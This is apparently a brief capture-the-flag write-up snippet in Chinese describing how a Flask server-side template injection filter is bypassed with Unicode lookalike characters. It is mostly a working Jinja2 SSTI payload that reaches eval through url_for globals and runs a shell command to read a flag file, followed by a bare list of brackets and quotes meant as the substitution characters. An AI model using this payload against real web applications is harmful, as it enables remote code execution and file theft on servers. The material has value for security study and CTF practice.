字符规范器,过滤掉了Flask SSTI常见的字符,用Unicode字符绕过。
{{url_for.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}
Last updated 1 year ago
{
{
}
}
[
[
]
]
'
'
"
"